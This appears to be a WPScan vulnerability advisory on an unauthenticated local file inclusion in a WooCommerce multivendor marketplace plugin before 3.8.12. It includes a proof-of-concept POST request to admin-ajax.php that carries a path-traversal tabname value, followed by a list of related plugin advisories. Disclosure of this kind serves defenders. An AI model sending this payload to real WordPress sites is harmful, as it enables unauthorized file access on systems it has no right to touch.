Multivendor Marketplace Solution for WooCommerce < 3.8.12 – Unauthenticated LFI | Plugin Vulnerabilities

Description

The plugin does not validate and sanitise a parameter before using it to include a file via an AJAX action available to both unauthenticated and authenticated users, which could lead to Local File Inclusion

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

action=wcmp_announcements_refresh_tab_data&tabname=/../../../index

Affects Plugins

dc-woocommerce-multi-vendor

Fixed in 3.8.12

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPscan

Verified

Yes

WPVDB ID

ad83008b-aca5-462b-a27f-acc01c7376be

Timeline

Publicly Published

2022-08-15 (about 3 years ago)

Added

2022-08-15 (about 3 years ago)

Last Updated

2022-08-15 (about 3 years ago)

Other

Published

Title

Published

2025-05-02

Title

Web3Press < 3.3.0 - Authenticated (Contributor+) Arbitrary File Read

Published

2025-05-14

Title

TicketBAI Facturas para WooCommerce < 3.19 - Unauthenticated Arbitrary File Deletion

Published

2024-11-08

Title

WPLMS Learning Management System for WordPress < 4.963 - Unauthenticated Arbitrary File Read and Deletion

Published

2025-11-12

Title

Data Tables Generator by Supsystic < 1.10.46 - Authenticated (Admin+) Arbitrary File Deletion

Published

2015-01-01

Title

Cart66 Pro <= 1.5.3 - Authenticated Arbitrary File Disclosure